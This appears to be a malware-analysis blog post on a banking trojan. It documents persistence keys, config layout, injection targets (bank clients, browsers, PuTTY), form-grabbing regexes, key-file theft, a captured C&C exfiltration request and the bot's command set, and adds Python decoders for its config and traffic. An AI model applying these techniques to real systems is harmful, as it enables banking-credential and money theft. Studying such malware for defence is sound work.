[General View]
Before you start reading my notes about this malware, read the other articles on it first:
OK, now let's look at the bot's PE image. It has no import table, and most strings are encrypted.
After some reversing I figured out the malware's API-calling convention; look at this picture:
Every time the bot wants to call an API, it gets a pointer to the API-table buffer (in the picture that pointer is in register eax) and selects the desired function by index (in the picture the index is 0x13c).
To make analysis easier I've built this API table:
http://pastebin.com/g0MXyTnr
Also, here is my IDAPython script for decrypting the strings:
http://pastebin.com/F5MSe6BD
[Malware Installing]
Installation into the system is trivial.
First of all, the malware tries to drop itself into one of two locations:
- the system directory (GetSystemDirectory)
- the temp directory (GetTempPath)
The dropped filenames are hardcoded; in my sample they are:
- ifkf_mfLEnWa_g.exe
- BlvyLYGJKTTLK_gTzE.exe
All dropped files are given the file times of the original kernel32.dll.
Here are the autorun registry keys that the bot uses:
- Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
- Software\Microsoft\Windows\CurrentVersion\Run
- SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (x64)
Name of the registry value the bot writes under those keys for autorun:
LmihNjzSczsUOFeQZJkVKCBFoz
The malware also stores its main config in the registry, under:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Value name: SysDebug32
The config is encrypted with the same algorithm that is used for the strings. Below is the structure of the config:
Config total size: 0x312 bytes
BotConfig

Offset | Field name
--- | ---
0x0 | char* host_url (C&C URL)
0x64 | char* botID (see the description below)
0x96 | bool block_bank_client_Work_1 (checked in the Java injection code)
0x97 | bool block_bank_client_Work_2 (checked in the Java injection code)
0x98 | bool block_bank_client_Work_3 (checked in the Java injection code)
0x99 | bool block_bank_client_Work_4 (checked in the cbmain.ex injection code)
0x9D | bool block_bank_client_Work_5 (checked in the wclnt.exe, ip-client.exe, rclient.exe injection code)
0x9F | bool block_bank_client_Work_6 (checked in the tiny.exe injection code)
0xAE | ??
0xB2 | ??
0xBA | bool ProxyMode
0xBB | DWORD netAddr (proxy backconnect address)
0xBF | WORD port (proxy backconnect port)
0xC1 | DWORD send_net_request (if set to 1, the bot sends Net_Request)
0xC5 | ??
0xC9 | DWORD rand
0xCD | DWORD rand
0xD1 | struct FILETIME (bot start time: GetSystemTime -> SystemTimeToFileTime)
0xD9 | ??
0xDB | ??
0x1A1 | ??
0x30E | DWORD hash_config (used for checking config integrity)
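The parser below is an added example, not code from the author or from the malware: it pulls the known fields out of an already decrypted config blob using the offsets from the table above, on a constructed sample. It assumes that host_url and botID are inline NUL-terminated strings occupying the space up to the next field and that netAddr is stored in network byte order (neither is stated on the page); the config encryption and the hash_config algorithm are not covered.

```python
import struct

CONFIG_SIZE = 0x312  # total size of the config as stated on the page

# (offset, struct format) for the fields the table identifies; the "??" slots are skipped.
LAYOUT = {
    "block_bank_client_Work_1": (0x96, "<?"), "block_bank_client_Work_2": (0x97, "<?"),
    "block_bank_client_Work_3": (0x98, "<?"), "block_bank_client_Work_4": (0x99, "<?"),
    "block_bank_client_Work_5": (0x9D, "<?"), "block_bank_client_Work_6": (0x9F, "<?"),
    "ProxyMode": (0xBA, "<?"),
    "netAddr": (0xBB, "<I"),            # proxy backconnect address
    "port": (0xBF, "<H"),               # proxy backconnect port
    "send_net_request": (0xC1, "<I"),   # 1 => bot sends Net_Request
    "rand1": (0xC9, "<I"), "rand2": (0xCD, "<I"),
    "start_time": (0xD1, "<Q"),         # FILETIME read as one 64-bit value
    "hash_config": (0x30E, "<I"),       # integrity hash; algorithm unknown, read raw
}

def _cstring(blob: bytes, start: int, end: int) -> str:
    """Assumption: strings are inline and NUL-terminated inside their slot."""
    return blob[start:end].split(b"\x00", 1)[0].decode("latin-1")

def dotted_quad(addr: int) -> str:
    """Render netAddr in storage order (assumes inet_addr-style network byte order)."""
    return ".".join(str(b) for b in struct.pack("<I", addr))

def parse_config(blob: bytes) -> dict:
    """Extract the known fields of a decrypted config; rejects blobs of the wrong size."""
    if len(blob) != CONFIG_SIZE:
        raise ValueError(f"expected {CONFIG_SIZE:#x} bytes, got {len(blob):#x}")
    cfg = {"host_url": _cstring(blob, 0x0, 0x64), "botID": _cstring(blob, 0x64, 0x96)}
    for name, (offset, fmt) in LAYOUT.items():
        cfg[name] = struct.unpack_from(fmt, blob, offset)[0]
    return cfg

def build_sample() -> bytes:
    """Constructed decrypted config for demonstration; not bytes from a real sample."""
    blob = bytearray(CONFIG_SIZE)
    url = b"http://c2.example.invalid/releases/index.php"
    blob[0:len(url)] = url
    bot_id = b"0x16-constructed_id"
    blob[0x64:0x64 + len(bot_id)] = bot_id
    blob[0x96] = 1                                    # block_bank_client_Work_1 on
    blob[0xBA] = 1                                    # ProxyMode on
    blob[0xBB:0xBF] = bytes([10, 0, 0, 5])            # netAddr in network byte order
    struct.pack_into("<H", blob, 0xBF, 1080)          # port
    struct.pack_into("<I", blob, 0xC1, 1)             # send_net_request
    struct.pack_into("<I", blob, 0x30E, 0xDEADBEEF)   # hash_config placeholder value
    return bytes(blob)
```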
[AV Detecting]
The bot enumerates processes and looks for AV vendors' software:
Kaspersky
ESET
AVG
Avira
Avast
Norton Antivirus
McAfee
Panda Antivirus
Comodo
DrWeb
After this check it sends a request to the C&C with request type
AV_check (see the description below).
The bot is afraid of Kaspersky: if it finds a running Kaspersky process, it does not install itself in the system.
It also contains funny, useless code for killing the ESET GUI process (egui.exe).
In that code it just tries to open the process with
PROCESS_TERMINATE access and terminate it... So this is a fucking disaster!
[Injection Code]
The injection mechanism in this malware is just CreateRemoteThread.
The bot injects its main payload code into other processes:
- on x86 systems it is svchost.exe
- on x64 systems it is explorer.exe (it creates an explorer process and injects into it)
The bot has a hardcoded table consisting of process-name hashes and the matching code-injection functions.
In the sample I have, some process names in the table have no injection code. Probably this is customized when the bot is built.
Here I've gathered information about all the processes I found in that table:
Table of process names used in the malware for code injection

Company (Software) Name | URL | Image name | Injection Code
--- | --- | --- | ---
BSS DBO Bank-Client | http://www.bssys.com/en/ | cbmain.ex | yes
Western Union | http://www.westernunion.com | translink.exe | yes
SberBank Bank-Client | http://www.sbrf.ru/en/ | wclnt.exe | yes
KazKom bank client | http://en.kkb.kz/ | rclient.exe | yes
WebMoney Transfer | http://www.wmtransfer.com/ | webmoney.exe | yes
Contact Money transfer system | http://www.contact-sys.com/eng/index.phtml | contactNG.exe | yes
CBS scrooge | http://eng.lime-systems.com/ | tiny.exe | yes
Unistream Money Transfer | http://intl.unistream.com | UniStream.exe | yes
Baltic Bank client | http://www.baltbank.ru/bc/ | BBClient.exe | yes
Mozilla Firefox | http://www.mozilla.org/en-US/ | firefox.exe | yes
Opera | http://www.opera.com/ | opera.exe | yes
Safari Browser | http://support.apple.com/kb/DL1531 | safari.exe | yes
Microsoft | http://windows.microsoft.com | iexplore.exe | yes
Oracle | http://www.oracle.com/index.html | java.exe, javaw.exe | yes
PuTTY SSH and telnet client | http://www.putty.org | putty.exe | yes
IntrustBank client | http://www.intrustbank.ru/ | clntw32.exe | no
Bank client | http://www.rpb.ru/doc/doku.php?id=goststart | intpro.exe | no
Credit bank of Moscow | http://english.mkb.ru/ | bc_loader.exe | no
B24 bank client | http://www.bank24.ru/ | iscc.exe | no
Inbank bank client | https://inbank.org/ | inbank-start-ff.exe | no
UralSib bank client | http://www.bankuralsib.ru/index.wbp | kb_cli.exe, kb_cli.ex | no
Unknown bank client | -/- | bankcl.exe | no
Unknown bank client | -/- | bk.exe | no
Microsoft | http://windows.microsoft.com | ntvdm.exe | no
Unknown bank client | -/- | startclient7.exe | no
Chelyabinsk bank client | http://www.chelinvest.ru/ | el_cli.ex | no
Unknown bank client | -/- | clbank.exe | no
Unknown bank client | -/- | oncbcli.exe | no
Unknown bank client | -/- | clmain.exe | no
RegionBank client | http://www.nomos-regiobank.ru/ | elbank.exe | no
BiKript bank client | http://www.s3bank.ru/corp/client-bank/index.phtml/ | ISClient.exe | no
SGB bank client | http://www.severgazbank.ru/ | sgbclient.exe | no
MFbank client | http://www.mfbank.ru/index.php | loadmain.exe | no
Unknown | -/- | selva_copy.exe | no
Unknown bank client | -/- | client7.exe | no
Unknown bank client | -/- | bclient.exe | no
Bank+ client | http://cbs.inversion.ru/ | cbsmain.exe | no
Here are examples of the payload for some processes:

Firefox, Iexplore, Opera, Safari payload
- Deletes all .ibank* files in systemroot/system32/java/ and in the %USERPROFILE% directory
- Hooks functions:
  wininet.dll: HttpSendRequestW, HttpSendRequestA, HttpSendRequestExA, InternetWriteFile
  Firefox-specific hook: NSPR4.dll: PR_Write
In the handler of the hooked functions it monitors access to online banks by pattern matching.
Here are the pattern strings it uses:
https:\/\/ibank.prbb.ru
https:\/\/ibank.alfabank.ru
auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
\/servlets\/mbo
\/servlets\/ibc
/bsi.dll
username=.*&password=.*
wclnt.exe, rclient.exe, ipclient.exe process payload
- Hooks function: kernel32.dll: CreateFile
In the handler of the hooked function it captures key files and sends them to the C&C (see Send_key_file_request below):
sign.key, master.key, UZ.DB3, GK.DB3
In general the injected payloads look similar, and most of them are based on searching for windows, taking screenshots and grabbing information from windows. Here is a table of the windows searched for (some captions are in Russian):
Searched windows table

Window Class | Window Caption
--- | ---
SunAwtDialog | Вход в систему (Log in to the system), Синхронизация с Банком (Synchronization with the Bank)
SunAwtFrame | Вход в систему (Log in to the system), Welcome
javax.swing.JFrame | Вход в систему (Log in to the system), Welcome
MSAWT_Comp_Class | Вход в систему (Log in to the system), Welcome
PuTTY | -/-
TLoginWindow | Логин (Login)
TGetOper | Вход в систему (Log in to the system)
ThunderRT6FormDC | Western Union Translink
TfAuthNew | Tiny Client-Bank
WebMoney Keeper Classic | Идентификация пользователя (User identification)
UNIStreamR. Аутентификация. (Authentication) | -/-
[Network Activity]
I identified three main parts of this bot's network activity:
- Sending information to and getting tasks from the C&C by HTTP GET/POST requests.
- Binding a port to accept incoming connections, to enable remote access to a smart card.
- Supporting a reverse (backconnect) SOCKS5 proxy.
The bot encrypts traffic with a custom base64 algorithm using this alphabet:
"qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
So it is pretty easy to decrypt the traffic with a tool like this:
http://www.kahusecurity.com/2011/custom-base64-decoder/
A typical bot request looks like this:
------------------------------------------------------------------------------------
POST /releases/index.php HTTP/1.1
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache
--7DD02020A0D0000
Content-Disposition: form-data; name="q"
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000
Content-Disposition: form-data; name="data"; filename="new_file"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
J3gS6SffbwB1fUno8z+y46+y4ZS=
--7DD02020A0D0000--
------------------------------------------------------------------------------------
Okay, let's parse this:
Blue color: static value.
Green color: the boundary, generated from GetSystemTime with the format string
%02X%02X%02X%02X%02X%04X
Purple color: random User-Agent; see all possible values in the table below.
Orange color: the header of the request message; here is an example of how it looks decrypted:
id=0x16-779d52d376_33e2e8df_eb1735e7&session=2458654464&v=16779010&name=keno&mj=5&mi=1&pt=1&b=2600&dc=32
Format string:
id=%s&session=%u&v=%u&name=%s&mj=%u&mi=%u&pt=%u&b=%u&dc=%u
id = BotId, generated from the host name and two magic DWORDs computed by the main encryption algorithm (part of the key-table generation), but using another
alphabet:
- STORAGE_DEVICE_DESCRIPTOR serial number and product ID in the first round
- IP_ADAPTER_INFO.address in the second round
session = random value
v = bot version number (constant value)
name = bot build name (constant string)
mj = Windows MajorVersion
mi = Windows MinorVersion
pt = Windows ProductType
b = Windows BuildNumber
dc = processor architecture (x86/x64)
Aqua color: request type; see the type table below.
Red color: the data of the request.
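The decoder below is an added example, not the author's script or the kahusecurity tool: it remaps the bot's alphabet onto the standard base64 alphabet, decodes the two form fields from the captured request above, and splits the decrypted header into its parameters. Only the alphabet and the captured fields come from the page; the function names are mine.

```python
import base64

# The bot's alphabet as given on the page (64 symbols followed by the '=' pad character)
# and the standard base64 alphabet in the same order, so a 1:1 remap suffices.
BOT_ALPHABET = "qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
_TO_STD = str.maketrans(BOT_ALPHABET, STD_ALPHABET)
_TO_BOT = str.maketrans(STD_ALPHABET, BOT_ALPHABET)


def bot_b64decode(text: str) -> bytes:
    """Decode a bot-encoded field by translating it to standard base64 first."""
    std = text.strip().translate(_TO_STD)
    std += "=" * (-len(std) % 4)  # tolerate fields whose padding was stripped
    return base64.b64decode(std)


def bot_b64encode(raw: bytes) -> str:
    """Encode with the bot's alphabet (handy for building detection test traffic)."""
    return base64.b64encode(raw).decode("ascii").translate(_TO_BOT)


def parse_header(decoded: bytes) -> dict:
    """Split the decrypted 'q' field (id=...&session=...&...) into a dict.

    A request-type parameter (e.g. &t=123, &av=1, &exception) shows up as an
    extra key; parameters without '=' get an empty value."""
    fields = {}
    for part in decoded.decode("ascii", errors="replace").split("&"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


# The two form fields exactly as they appear in the captured request on this page.
CAPTURED_Q = ("vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfz"
              "YJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==")
CAPTURED_DATA = "J3gS6SffbwB1fUno8z+y46+y4ZS="

if __name__ == "__main__":
    print(parse_header(bot_b64decode(CAPTURED_Q)))   # id, session, v, name, mj, mi, ...
    print(bot_b64decode(CAPTURED_DATA))               # the Notify_request payload
```

Decoding the "data" field of the captured request yields a NOTIFY:%processname% message, which is how a network sensor can attribute such a POST to the injection notification described in the request-type table.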
User agent table
Firefly/1.0 (compatible; Mozilla 4.0; MSIE 5.5)
FlashGet
Flexum/2.0
FreshDownload/x.xx
FavIconizer
DeepIndex
gsa-crawler
ContentSmartz
Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) TrueRobot; 1.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)
Mozilla/5.0 (compatible; TridentSpider/3.1)
NationalDirectoryAddURL/1.0
NETCOMplete/x.xx
Nocilla/1.0
OliverPerry
OpenTextSiteCrawler/2.9.2
Opera/8.xx (Windows NT 5.1; U; en)
Opera/9.00 (Windows NT 5.1; U; de)
PHP/4.0.6
PHP/4.1.2
Popdexter/1.0
PureSight
RAYSPIDER/Nutch-0.9
Scooter-3.2.EX
SearchdayBot
ShablastBot 1.0
SiteXpert
TeamSoft WinInet Component
Toutatis x.x-x
URLBase/6.x
WebCorp/1.0
Y!J-SRD/1.0
Yeti
Zend_Http_Client
Request Type table

Request type name | Request Parameters | Additional Description
--- | --- | ---
AV_check | &av=%d | Sent to report which AV software is running
Check_token | &token=0 (token does not exist) / &token=1 (token exists) | 
Send_key_file_request | &cb=1 | Sends a bank-client key file
Excep_request | &exception | Sent when an unhandled exception occurs in the bot
Alr_load_request | &lr=1 | Sent when creating the mutex fails, i.e. an already running bot was detected
SendFile_Request | &file=1 (file not found) / &file=2 (file sent in a CAB archive) | 
Comm_compl_request | &cmd=1 | Sent when a command received from the C&C has completed
Load_execute_request | &load=1 (success) / &load=2 (failed) | 
Net_Request | &net=1 | Sends the bot's network information
Key_request | &keys=1 | Sent when a .jks key is found
Screen_request | &screen=1 | Sent when a screenshot is taken (screenshot in a CAB file)
Notify_request | &t=%d (random) | Sent after injecting into a process (request data: NOTIFY:%processname%)
The bot asks the C&C for tasks in a loop by sending requests.
Here is how a typical task request to the C&C and its answer look:
Below is the structure of a response from the C&C:
Task Message:
    DWORD count_param
    DWORD command
    BYTE  data[]
Command table

Command | Description
--- | ---
0x2 | Bot self-update
0x3 | Enable blocking of the bank client (set block_bank_client_Work_1 and block_bank_client_Work_2 to true in the config)
0x4 | Disable blocking of the bank client (set block_bank_client_Work_1 and block_bank_client_Work_2 to false in the config)
0x5 | Enable blocking of the bank client (set block_bank_client_Work_3 to true in the config)
0x6 | Disable blocking of the bank client (set block_bank_client_Work_3 to true in the config)
0x7 | Enable proxy mode (set ProxyMode to true, set netAddr and port in the config)
0x8 | Disable proxy mode (set ProxyMode to false in the config)
0x9 | Get a list of files from all volumes (if data[] == NULL) or search for a file (filename mask in data[]); send SendFile_Request
0x0A | Download a file from the URL given in data[] with a GET request and execute it; send Load_execute_request
0x0C | Search for key files (mask *.jks); send Key_request
0x0D | Kill the OS (delete files *.*, cause a BSOD as in command 0x11)
0x0E | Bot self-delete
0x0F | Send the bot's network information (Net_Request)
0x10 | Reboot the system
0x11 | BSOD the system (inject a thread into csrss and raise an exception in that thread)
0x12 | Set the value at offset 0xC5 to 1 (unknown)
0x13 | Set the value at offset 0xC5 to 0 (unknown)
0x14 | Update the C&C URL in the config (field host_url)
0x15 | Enable blocking of the bank client (set block_bank_client_Work_4 to true in the config)
0x16 | Disable blocking of the bank client (set block_bank_client_Work_4 to false in the config)
0x19 | Enable blocking of the bank client (set block_bank_client_work_5 to true in the config)
0x1B | Load and launch a module
0x1C | Take a screenshot; send Screen_request
0x20 | Disable blocking of the bank client (set block_bank_client_work_5 to false in the config)
If the C&C does not respond during the task cycle, the bot can update its config to use the second C&C URL.
As I said, the bot binds a port (0x165a) to support remote control of a smart card.
In a simplified manner, the commands give the ability to use these APIs:
0x0 SCardStatusA
0x1 SCardGetStatusChangeA
0x2 SCardDisconnect
0x3 SCardControl
0x4 SCardEstablishContext
0x5 SCardListReadersA
0x6 SCardConnectA
0x7 SCardBeginTransaction
0x8 SCardEndTransaction
0x9 SCardTransmit
0xa SCardGetAttrib
Some additional information about the C&C directory structure (not all of it, of course):
/releases
    avs.php
    base64.php
    commands.php
    config.php
    stat.php
    getrc.php
/inc
    jabber.php
    thumbnail.php
/modules
    /default
    /32
    /64
    /other
/_screenshots
    /1004 (example)
/_files
[Conclusion]
I still haven't described a lot of this bot: the reverse proxy protocol, the Java patching, etc. Maybe I forgot something, or some other shit.
But in the end my goal was just to show you a paradox:
bots with a simple architecture still work effectively and still steal money.
Thanks for reading ^_^
---------------------------
Cause and effect.